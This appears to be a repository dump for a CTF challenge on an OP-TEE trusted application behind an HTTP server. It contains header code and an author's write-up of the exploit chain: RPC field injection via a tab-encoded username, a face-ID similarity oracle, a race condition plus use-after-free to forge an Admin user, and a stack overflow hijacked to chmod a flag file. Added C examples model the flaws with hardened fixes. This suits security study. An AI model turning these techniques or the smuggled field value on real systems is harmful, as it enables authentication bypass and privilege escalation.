#define MAKE_FILE_INFO_DETAIL_REF(file_info, file_node, _filename) ({ \ 226 | if(_file_info){ \ 227 | (_file_info)->node_type = (file_node)->node_type; \ 228 | (_file_info)->parent_id = (file_node)->parent_id; \ 229 | (_file_info)->ext_id = (file_node)->ext_id; \ 230 | (_file_info)->owner = (file_node)->owner; \ 231 | (_file_info)->file_size = (file_node)->file_size; \ 232 | strncpy((_file_info)->filename, _filename, MAX_FILE_NAME); \ 233 | } \ 234 | _file_info; \ 235 | }) 236 | 237 | #define SEC_FILE_MAGIC 0x73656366 238 | #define MAKE_SEC_FILE_REF(file, _filename, data, data_sz) ({ \ 239 | int _ret = 0; \ 240 | if(strlen(_filename) > MAX_FILE_NAME) \ 241 | _ret = 1; \ 242 | if(d3_core_sha256(data, data_sz, (file)->hash) != TEE_SHA256_HASH_SIZE) \ 243 | _ret = 1; \ 244 | (file)->magic = SEC_FILE_MAGIC; \ 245 | memset((file)->filename, 0, MAX_FILE_NAME); \ 246 | strncpy((file)->filename, _filename, MAX_FILE_NAME); \ 247 | (file)->status = SEC_FILE_STATUS_FILE; \ 248 | memcpy((file)->data, data, data_sz); \ 249 | (file)->name_size = strlen((file)->filename); \ 250 | (file)->data_size = data_sz; \ 251 | _ret; \ 252 | }) 253 | 254 | #define MAKE_SEC_DIR_REF(file, _dir_name) ({ \ 255 | int _ret = 0; \ 256 | if(strlen(_dir_name) > MAX_FILE_NAME) \ 257 | _ret = 1; \ 258 | memset((file)->hash, 0, TEE_SHA256_HASH_SIZE); \ 259 | (file)->magic = SEC_FILE_MAGIC; \ 260 | memset((file)->filename, 0, MAX_FILE_NAME); \ 261 | strncpy((file)->filename, _dir_name, MAX_FILE_NAME); \ 262 | (file)->name_size = strlen((file)->filename); \ 263 | (file)->data_size = 0; \ 264 | (file)->status = SEC_FILE_STATUS_DIR; \ 265 | _ret; \ 266 | }) 267 | 268 | 269 | #define MAKE_USER_INFO_OUT(user_info, user_info_out) { \ 270 | user_info_out.magic = user_info.magic; \ 271 | user_info_out.uid = user_info.uid; \ 272 | user_info_out.type = user_info.type; \ 273 | user_info_out.face_id = user_info.face_id; \ 274 | memcpy(user_info_out.username, user_info.username, MAX_USERNAME_LEN+8); \ 275 | } 276 | 
277 | #define MAKE_USER_INFO_OUT_REF(user_info, user_info_out) { \ 278 | (user_info_out)->magic = (user_info)->magic; \ 279 | (user_info_out)->uid = (user_info)->uid; \ 280 | (user_info_out)->type = (user_info)->type; \ 281 | (user_info_out)->face_id = (user_info)->face_id; \ 282 | memcpy((user_info_out)->username, (user_info)->username, MAX_USERNAME_LEN+8); \ 283 | } 284 | 285 | typedef struct Session session_t; 286 | struct Session{ 287 | uint32_t uid; 288 | user_info_t *user_info; 289 | char session_id[MAX_SESSION_LEN+8]; 290 | session_t *next; 291 | }; 292 | 293 | 294 | // all functions's declaration 295 | typedef double vec_float; 296 | vec_float sqrt(vec_float x); 297 | vec_float d3_core_euclidean_distance(const vec_float *x, const vec_float *y, uint32_t size); 298 | uint32_t d3_core_sha256(uint8_t * data, uint32_t data_len, uint8_t* hash); 299 | uint32_t d3_core_hexlify(uint8_t *data, uint32_t data_len, uint8_t *hex_str, uint32_t hex_str_len); 300 | uint32_t d3_core_unhexlify(uint8_t *hex_str, uint32_t hex_str_len, uint8_t *data, uint32_t data_len); 301 | uint32_t d3_core_sha256_and_hexlify(uint8_t * data, uint32_t data_len, uint8_t* hash_hexlify, uint32_t hash_hexlify_len); 302 | uint32_t d3_core_add_user_info(user_info_t **entry, uint32_t magic, uint32_t user_id, uint32_t user_type, const char * username, const char * password); 303 | void d3_core_log_user_obj(user_info_t *entry); 304 | uint32_t d3_core_remove_user_info(user_info_t **entry, const char * username); 305 | session_t *d3_core_get_session(session_t *entry, const char *session_id); 306 | session_t *d3_core_get_alive_session_by_uid(session_t *entry, uint32_t uid); 307 | session_t *d3_core_get_alive_session_by_name(session_t *entry, const char *username); 308 | uint32_t d3_core_check_valid_session(session_t *entry, const char *session_id, session_t **target); 309 | uint32_t d3_core_get_user_info_from_session(session_t *entry, char *session_id, user_info_t **user_info); 310 | uint32_t 
d3_core_get_user_list(user_info_t *entry, uint32_t *count, user_info_out_t **res);
uint32_t d3_core_enable_user_face_id(user_info_t *entry, const char *username, const vec_float *face_data, uint32_t do_alloc);
uint32_t d3_core_disable_user_face_id(user_info_t *entry, const char *username);
uint32_t d3_core_check_user_passwd(user_info_t *entry, const char *username, const char *password);
uint32_t d3_core_check_user_action_perm(user_info_t *user, user_info_t *op_user, uint32_t action);
uint32_t d3_core_check_user_face(user_info_t *entry, const char *username, const double *face_data, vec_float *similarity);
user_info_t *d3_core_get_user_by_name(user_info_t *entry, const char *username);
user_info_t *d3_core_move_user_by_name(user_info_t **entry_from, user_info_t **entry_to, const char *username);
uint32_t d3_core_add_new_session(session_t **entry, user_info_t *user, const char *session_id);
uint32_t d3_core_delete_session(session_t **entry, const char *session_id);
uint32_t d3_core_kickout_user(session_t **entry, user_info_t *user);

uint32_t d3_core_gen_random_obj_id(char *buf, uint32_t buf_size);
uint32_t d3_core_create_secure_file(const char *filename, uint32_t parent_id, uint32_t owner, const uint8_t *data, uint32_t data_sz, uint32_t *ext_id_out);
uint32_t d3_core_create_secure_dir(const char *dir_name, uint32_t parent_id, uint32_t owner, uint32_t *ext_id_out);
uint32_t d3_core_delete_secure_file(uint32_t ext_id, uint32_t erase);
uint32_t d3_core_delete_secure_dir(uint32_t ext_id, uint32_t recursive);
uint32_t d3_core_get_sec_file_info(uint32_t ext_id, file_info_t *file_info);
uint32_t d3_core_read_sec_file(uint32_t ext_id, char *file_data, uint32_t max_sz, uint32_t *data_sz);


#endif /*TA_D3_TRUSTED_CORE_H*/

--------------------------------------------------------------------------------
/src/d3_trusted_core/ta/sub.mk:
--------------------------------------------------------------------------------
global-incdirs-y += include
srcs-y += d3_trusted_core.c

# To remove a certain compiler flag, add a line like this
#cflags-template_ta.c-y += -Wno-strict-prototypes

--------------------------------------------------------------------------------
/src/d3_trusted_core/ta/user_ta_header_defines.h:
--------------------------------------------------------------------------------
/*
 * Copyright (c) 2016-2017, Linaro Limited
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions are met:
 *
 * 1. Redistributions of source code must retain the above copyright notice,
 *    this list of conditions and the following disclaimer.
 *
 * 2. Redistributions in binary form must reproduce the above copyright notice,
 *    this list of conditions and the following disclaimer in the documentation
 *    and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
 * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
 * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
 * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
 * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 */

/*
 * The name of this file must not be modified
 */

#ifndef USER_TA_HEADER_DEFINES_H
#define USER_TA_HEADER_DEFINES_H

/* To get the TA UUID definition */
#include <d3_trusted_core_ta.h>

#define TA_UUID TA_D3_TRUSTED_CORE_UUID

/*
 * TA properties: multi-instance TA, no specific attribute
 * TA_FLAG_EXEC_DDR is meaningless but mandated.
 */
#define TA_FLAGS TA_FLAG_EXEC_DDR

/* Provisioned stack size */
#define TA_STACK_SIZE (2 * 1024)

/* Provisioned heap size for TEE_Malloc() and friends */
#define TA_DATA_SIZE (32 * 1024)

/* The gpd.ta.version property */
#define TA_VERSION "1.0"

/* The gpd.ta.description property */
#define TA_DESCRIPTION "D3^CTF Trusted Execution Environment (TEE) Core Module."

/* Extra properties */
#define TA_CURRENT_TA_EXT_PROPERTIES \
    { "org.linaro.optee.examples.d3_trusted_core.property1", \
        USER_TA_PROP_TYPE_STRING, \
        "Eqqie" }, \
    { "org.linaro.optee.examples.d3_trusted_core.property2", \
        USER_TA_PROP_TYPE_U32, &(const uint32_t){ 0x0010 } }

#endif /* USER_TA_HEADER_DEFINES_H */

--------------------------------------------------------------------------------
/writeup en-US.md:
--------------------------------------------------------------------------------
## d3TrustedHTTPd

> Github Repo: [d3ctf-2022-pwn-d3TrustedHTTPd](https://github.com/yikesoftware/d3ctf-2022-pwn-d3TrustedHTTPd)

> Author: Eqqie @ D^3CTF

### Analysis

This is a challenge about ARM TEE vulnerability exploitation. I wrote an HTTPd as well as an RPC middleware on top of the regular TEE Pwn. The TA provides authentication services for HTTPd and a simple file system based on OP-TEE secure storage. HTTPd is based on mini_httpd, and the RPC middleware is located at `/usr/bin/optee_d3_trusted_core`. They are related as follows.

![1](https://s2.loli.net/2023/05/03/pMyUuEAeDsN6lm4.png)

To read the log from the secure world (TEE), you can add this line to the QEMU args in `run.sh`.

```shell
-serial tcp:localhost:54320 -serial tcp:localhost:54321 \
```

This challenge contains a lot of code and memory corruption that stems from logic vulnerabilities, so reversing the program takes a lot of time. To quickly identify the OP-TEE API in the TA, I recommend using the [BinaryAI](https://www.binaryai.cn/) online tool to analyze TA binaries; it can greatly reduce unnecessary workload.

![f5da5a5cb1efe21d620a0a63feda4ff](https://s2.loli.net/2023/05/03/sivkw9IR5JoEcUu.png)

### Step 1

The first vulnerability appears in the RPC implementation between HTTPd and `optee_d3_trusted_core`. When getting the username parameter, HTTPd only replaces spaces with null and splices the username onto the end of the string used for RPC.

![image-20230502220946251](https://s2.loli.net/2023/05/03/bhKWtqHs89E2jUR.png)

![image-20230502221009171](https://s2.loli.net/2023/05/03/dnCHmKecbaWzBfN.png)

When parsing RPC data, `optee_d3_trusted_core` treats both spaces and `\t` (%09) as field separators, so we can inject additional fields into the RPC request via `\t`.

![image-20230502221340781](https://s2.loli.net/2023/05/03/hie4yxg18blR3HP.png)

When an attacker requests to log in as the `eqqie` user using face_id, the similarity between the real face_id vector and the face_id vector sent by the attacker, expressed as the inverse of the Euclidean distance, can be leaked by injecting `eqqie%09get_similarity`.

The attacker can traverse each dimension of the face_id vector with a certain step value (such as 0.015) and request the similarity of the current vector from the server to find the value that maximizes the similarity in each dimension.
When all 128 dimensions in the vector have completed this calculation, the vector with the highest overall similarity is obtained, and when the similarity exceeds the threshold of 85% in the TA, the Face ID authentication can be passed, bypassing the login restriction.

### Step 2

In the second step we complete user privilege elevation by combining a TOCTOU race condition vulnerability and a UAF vulnerability in the TA to obtain Admin user privileges.

When we use the `/api/man/user/disable` API to disable a user, HTTPd completes this behavior in two steps: first it kicks out the corresponding user using `command user kickout`, and then it adds the user to the disable list using `command user disable`.

![image-20230502223311793](https://s2.loli.net/2023/05/03/mqhalPFJbIgT7jd.png)

The TEE is atomic when calling `TEEC_InvokeCommand` in the same session, that is, the next Invoke can start to execute only when the current Invoke has finished, so there is no competition within an Invoke. But here, `TEEC_InvokeCommand` is called twice when implementing kickout, so there is a chance of a race condition.

The **Kickout** function is implemented by searching the session list for the session object whose recorded UID is the same as the UID of the user to be deleted, and releasing it.

![image-20230502223709668](https://s2.loli.net/2023/05/03/upUwTymjv56X3Hd.png)

The **Disable** function is implemented by moving the user specified by username from the enabled user list to the disabled user list.

![image-20230502224103696](https://s2.loli.net/2023/05/03/vQrm5nM7NJzChKa.png)

We can exploit the race as follows: we first log in as the guest user once so that it has a session, and then use two threads to **disable the guest user** and **log in to the guest user** in parallel.
There is a certain probability that, after the `/api/man/user/disable` interface kicks out the guest user, the attacker gives a new session to the guest user via the `/api/login` interface before the `/api/man/user/disable` interface moves the guest user into the disabled list. After completing this attack, the attacker holds a session that refers to the disabled user.

Based on this prerequisite, we can exploit a UAF vulnerability in the TA that occurs when resetting users. (I use the source code to show the location of the vulnerability more clearly.)

![image-20230502225611570](https://s2.loli.net/2023/05/03/b72Yx1jKCTJHtFe.png)

When you reset a user, if the user is already disabled, you enter the logic shown in the figure. The user's object is first removed from the user list, and if the `set_face_id` parameter is specified at reset time, a memory area is requested to hold the new face_id vector. The TA then recreates a user using `d3_core_add_user_info`. Finally, the TA iterates through all sessions and compares the UID to update the pointer to the user object referenced by the session. But instead of using `session->uid` when comparing UIDs, `session->user_info->uid` is used incorrectly. The object referenced by `session->user_info` has been freed earlier, so a freed chunk of memory is referenced here. If we can occupy this chunk by heap fengshui, we can bypass the updating of the user object reference on this session by modifying the UID held by the `user_info` object, and then make the session refer to a fake user object forged by the attacker. Naturally, the attacker can make the fake user an Admin user.

To complete the attack on this UAF, you can first read the article [BGET Explained (phi1010.github.io)](https://phi1010.github.io/2020-09-14-bget-exploitation/) to understand how the OP-TEE heap allocator works.
The OP-TEE heap allocator is roughly similar to the unsorted bin in Glibc, except that the bin starts with a large freed chunk, and an allocation through the bin is split from the tail of the larger chunk. When releasing a chunk, it tries to merge the freed chunk with the chunks before and after it and inserts it into the bin via a FIFO strategy. In order to exploit this vulnerability, we need to call the reset function after we adjust the heap layout from A to B, and then we can use the `delete->create->create` gadget in the reset function. It makes the heap layout change in the way of C->D->E. In the end we can forge an Admin user by controlling the new face data.

![image-20230502232518449](https://s2.loli.net/2023/05/03/p8WsyVN4JtRfq5K.png)

### Step 3

Once we have Admin privileges, we can fully use the secure file system implemented in the TA on top of OP-TEE secure storage (normal users only have read-only privileges).

The secure file system has two modes, **erase** and **mark**, when deleting files or directories. The erase mode deletes the entire file object from the OP-TEE secure storage, while the mark mode only marks the file node as deleted, and the node will not be reused until there is no free slot.

The secure file system uses the `SecFile` data structure when storing files and directories. When creating a directory, the status is set to `0xffff1001` (for a file, this value is `0xffff0000`). There are two options for deleting a directory, **recursive** and **non-recursive**. When deleting a directory in recursive mode, the data in the secure storage will not be erased, but marked as deleted.

```c
typedef struct SecFile sec_file_t;
typedef sec_file_t sec_dir_t;
#pragma pack(push, 4)
struct SecFile{
    uint32_t magic;
    char hash[TEE_SHA256_HASH_SIZE];
    uint32_t name_size;
    uint32_t data_size;
    char filename[MAX_FILE_NAME];
    uint32_t status;
    char data[0];
};
#pragma pack(pop)
```

There is a small bug when creating files with `d3_core_create_secure_file`: the `status` field is not rewritten when reusing a slot that is marked as deleted (`d3_core_create_secure_dir`, by comparison, does not have this flaw). On its own this does not affect much.

![image-20230503003858564](https://s2.loli.net/2023/05/03/faoiIJ67QUPg95X.png)

![image-20230503003654968](https://s2.loli.net/2023/05/03/8pXANtxW1OoQLPd.png)

But there is another flaw when renaming files: it is allowed to set a file name with a length of 128 bytes. Since the maximum length of the file name field is 128, this flaw causes the filename to lose the null byte at the end. Combined with the flaw that the `status` field is not rewritten, the updated file name length will include both the length of the file name itself and the length of the file content. This causes the file name and the content of the file to be returned together when using `d3_core_get_sec_file_info` to read file information.

![7ac17a0ea058ffb702e9754be596f8d](https://s2.loli.net/2023/05/03/SZwUrxIDz9n7Kji.png)

![070b86d520221b246afa7a1b2598b79](https://s2.loli.net/2023/05/03/fnVMyxIpuTtvwAg.png)

When the `d3_core_get_sec_file_info` function is called, the pointer used to store the file information in the CA is passed to the TA as a `TEEC_MEMREF_TEMP_INPUT` parameter. This pointer references the CA's buffer on the stack.
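
The name-length flaw described above can be reproduced on a model of the record. This is an added example, not code from the challenge: it assumes the rename path measures the name the way `MAKE_SEC_FILE_REF` does (`strlen((file)->filename)`), and `unbounded_name_len`, `name_len_in_slot` and `rename_checked` are hypothetical names. It compares the measured length in a file slot and in a reused directory slot, and shows a rename check that refuses 128-byte names.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_FILE_NAME 128                /* field size stated in the writeup */
#define TEE_SHA256_HASH_SIZE 32
#define SEC_FILE_STATUS_FILE 0xffff0000u /* status values quoted in the writeup */
#define SEC_FILE_STATUS_DIR  0xffff1001u

#pragma pack(push, 4)
typedef struct SecFile {                 /* layout as shown in the writeup */
    uint32_t magic;
    char hash[TEE_SHA256_HASH_SIZE];
    uint32_t name_size;
    uint32_t data_size;
    char filename[MAX_FILE_NAME];
    uint32_t status;
    char data[];
} sec_file_t;
#pragma pack(pop)

/* What strlen(f->filename) measures: bytes up to the first zero in the record, not
 * the field size. Bounded by record_size so the demo never leaves its allocation. */
size_t unbounded_name_len(const sec_file_t *f, size_t record_size) {
    const unsigned char *raw = (const unsigned char *)f;
    size_t i = offsetof(sec_file_t, filename);
    while (i < record_size && raw[i] != 0) i++;
    return i - offsetof(sec_file_t, filename);
}

/* A full 128-byte name (no terminator) stored in a slot that carries `status`. */
size_t name_len_in_slot(uint32_t status, size_t data_sz) {
    size_t record_size = sizeof(sec_file_t) + data_sz + 1;   /* +1: zero byte after the data */
    sec_file_t *f = calloc(1, record_size);
    if (!f) return 0;
    memset(f->filename, 'N', MAX_FILE_NAME);
    f->status = status;                  /* little-endian host assumed, as on aarch64 */
    memset(f->data, 'D', data_sz);
    size_t n = unbounded_name_len(f, record_size);
    free(f);
    return n;
}

/* Hardened rename: the name must leave room for its terminator, and the stored
 * length comes from the validated input, never from a scan of the record. */
int rename_checked(sec_file_t *f, const char *name) {
    size_t n = 0;
    while (n < MAX_FILE_NAME && name[n] != '\0')
        n++;
    if (n == 0 || n == MAX_FILE_NAME)    /* empty, or 128 bytes and more: refused */
        return -1;
    memset(f->filename, 0, MAX_FILE_NAME);
    memcpy(f->filename, name, n);
    f->name_size = (uint32_t)n;
    return 0;
}

int main(void) {
    printf("file slot: %zu, reused directory slot: %zu\n",
           name_len_in_slot(SEC_FILE_STATUS_FILE, 64), name_len_in_slot(SEC_FILE_STATUS_DIR, 64));
    return 0;
}
```

In a file slot the low byte of `0xffff0000` ends the scan at 128 bytes, while the stale directory status `0xffff1001` contains no zero byte, so the measured length runs on through the status word and the file content.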

![image-20230503004650985](https://s2.loli.net/2023/05/03/y7AS58Qx3Mq1EiI.png)

![12c883cc1a6d7728775b01700b41b2f](https://s2.loli.net/2023/05/03/ev7FwSyLDkNKQ1U.png)

![617a2c40f860058a6151024fff90ab7](https://s2.loli.net/2023/05/03/3muXdLSOQcRKB4r.png)

![image-20230503011850677](https://s2.loli.net/2023/05/03/WPa7jyZzUnmk81L.png)

A `TEEC_MEMREF_TEMP_INPUT` parameter of the CA is not copied but mapped when passed to the TA. This mapping is usually done in a **page-aligned** manner, which means that not only the data of the size specified in `tmpref.size` is mapped into the TA address space, but also other data located in the same page. The figure shows the address space of a TA; the marked position is the buffer parameter mapped into the TA.

![image-20230503005412695](https://s2.loli.net/2023/05/03/Uil428yKJpbHnQx.png)

In this challenge, the extra data we write to the buffer using `d3_core_get_sec_file_info` causes a **stack overflow** in the CA, because the buffer for storing the file name in the CA is only 128 bytes. As long as the file content is large enough, we can overwrite up to the return address in the CA. Since the `optee_d3_trusted_core` process runs with **root privileges**, hijacking its control flow gives a way to obtain the content of `/flag.txt`, which has the permission flag `400`. Note that during the buffer overflow, `/api/secfs/file/update` can be used to pre-occupy a larger filename size, thereby bypassing the limitation that the content after the null byte cannot be copied to the buffer.

With the help of a statically compiled `gdbserver`, we can quickly determine the stack location that controls the return address. For functions with buffer variables, aarch64 puts the return address on the top of the stack to prevent it from being overwritten.
What we overwrite is actually the return address of the upper-level function. With the help of the **almighty gadget** in the aarch64 ELF, we can control the `chmod` function to set the permission of `/flag.txt` to `766`, and then read the flag content directly from HTTPd.

![image-20230503011343736](https://s2.loli.net/2023/05/03/CchYHOqt46T3IGB.png)

![image-20230503011458586](https://s2.loli.net/2023/05/03/3D5JnBAPIoC8ptU.png)

### Exploit

See the code in [exp.py](https://github.com/yikesoftware/d3ctf-2022-pwn-d3TrustedHTTPd/blob/main/exp.py)

--------------------------------------------------------------------------------
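
For the Step 1 field injection, the following added example (not part of the original writeup or the challenge source) models the mismatch between a front-end filter that only handles spaces and a tokenizer that also splits on tab, next to an allowlist check applied before the username reaches the RPC line. The `user face_login` prefix, `DEMO_NAME_MAX` and all function names are assumptions made for the illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define RPC_PREFIX "user face_login "  /* constructed verb; the real RPC line is not on the page */
#define DEMO_NAME_MAX 32               /* assumed username limit for this illustration */

/* Front-end filter as the writeup describes it: only spaces are turned into NUL. */
static void filter_spaces_only(char *s) {
    for (; *s; s++)
        if (*s == ' ')
            *s = '\0';
}

/* Middleware tokenizer as described: a field ends at a space or at a tab. */
static int count_fields(const char *line) {
    int fields = 0, in_field = 0;
    for (; *line; line++) {
        if (*line == ' ' || *line == '\t') {
            in_field = 0;
        } else if (!in_field) {
            in_field = 1;
            fields++;
        }
    }
    return fields;
}

/* Hardened check: an allowlist, so no byte the tokenizer treats as a delimiter gets through. */
static int username_allowed(const char *s) {
    size_t n = strlen(s);
    if (n == 0 || n > DEMO_NAME_MAX)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.')
            return 0;
    }
    return 1;
}

/* Number of fields the middleware parses for this username, or -1 if the request is refused. */
int fields_parsed(const char *raw, int hardened) {
    char user[128], line[192];
    if (strlen(raw) >= sizeof user)
        return -1;
    strcpy(user, raw);
    if (hardened) {
        if (!username_allowed(user))
            return -1;
    } else {
        filter_spaces_only(user);
    }
    snprintf(line, sizeof line, "%s%s", RPC_PREFIX, user);
    return count_fields(line);
}

int main(void) {
    const char *decoded = "eqqie\tget_similarity";  /* constructed: the value after %09 is URL-decoded */
    printf("spaces-only filter: %d fields (3 intended)\n", fields_parsed(decoded, 0));
    printf("allowlist check:    %d\n", fields_parsed(decoded, 1));
    return 0;
}
```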
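
For Step 2, the following added example (a simplified model, not the TA's own code) replays the kickout/login/disable interleaving from the writeup and shows two hardened forms: a disable that marks the user and drops its sessions inside a single invoke, and a reset that rebinds sessions by the UID stored in the session itself instead of reading it through the stale `user_info` pointer. The `disabled` flag, `g_sessions` and the `ta_*` function names are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Simplified model: the real TA keeps enabled and disabled users on two lists. */
typedef struct UserInfo { uint32_t uid; int disabled; } user_info_t;
typedef struct Session session_t;
struct Session { uint32_t uid; user_info_t *user_info; session_t *next; };
static session_t *g_sessions;               /* session list held inside the TA */

int ta_login(user_info_t *u) {              /* one invoke */
    session_t *s = u->disabled ? NULL : calloc(1, sizeof *s);
    if (!s) return -1;
    s->uid = u->uid; s->user_info = u;
    s->next = g_sessions; g_sessions = s;
    return 0;
}

void ta_kickout(uint32_t uid) {             /* one invoke: drop every session of uid */
    session_t **pp = &g_sessions;
    while (*pp) {
        session_t *s = *pp;
        if (s->uid == uid) { *pp = s->next; free(s); }
        else pp = &s->next;
    }
}

void ta_disable_atomic(user_info_t *u) {    /* hardened: a single invoke does both */
    u->disabled = 1;                        /* refuse new logins first */
    ta_kickout(u->uid);                     /* then drop the existing sessions */
}

/* Hardened reset: rebind on the uid stored in the session, free the old record last. */
user_info_t *ta_reset_user(user_info_t *old) {
    user_info_t *fresh = calloc(1, sizeof *fresh);
    if (!fresh) return NULL;
    fresh->uid = old->uid;
    for (session_t *s = g_sessions; s; s = s->next)
        if (s->uid == old->uid)             /* never s->user_info->uid */
            s->user_info = fresh;
    free(old);
    return fresh;
}

int sessions_bound_to(const user_info_t *u) {
    int n = 0;
    for (session_t *s = g_sessions; s; s = s->next)
        n += (s->user_info == u);
    return n;
}

int split_disable_leftover(user_info_t *u) { /* interleaving from the writeup */
    ta_login(u);
    ta_kickout(u->uid);                     /* first invoke: kickout */
    ta_login(u);                            /* lands between the two invokes */
    u->disabled = 1;                        /* second invoke: disable */
    return sessions_bound_to(u);
}

int main(void) {
    user_info_t guest = { 1001, 0 };        /* constructed uid */
    printf("split disable leaves %d live session(s)\n", split_disable_leftover(&guest));
    return 0;
}
```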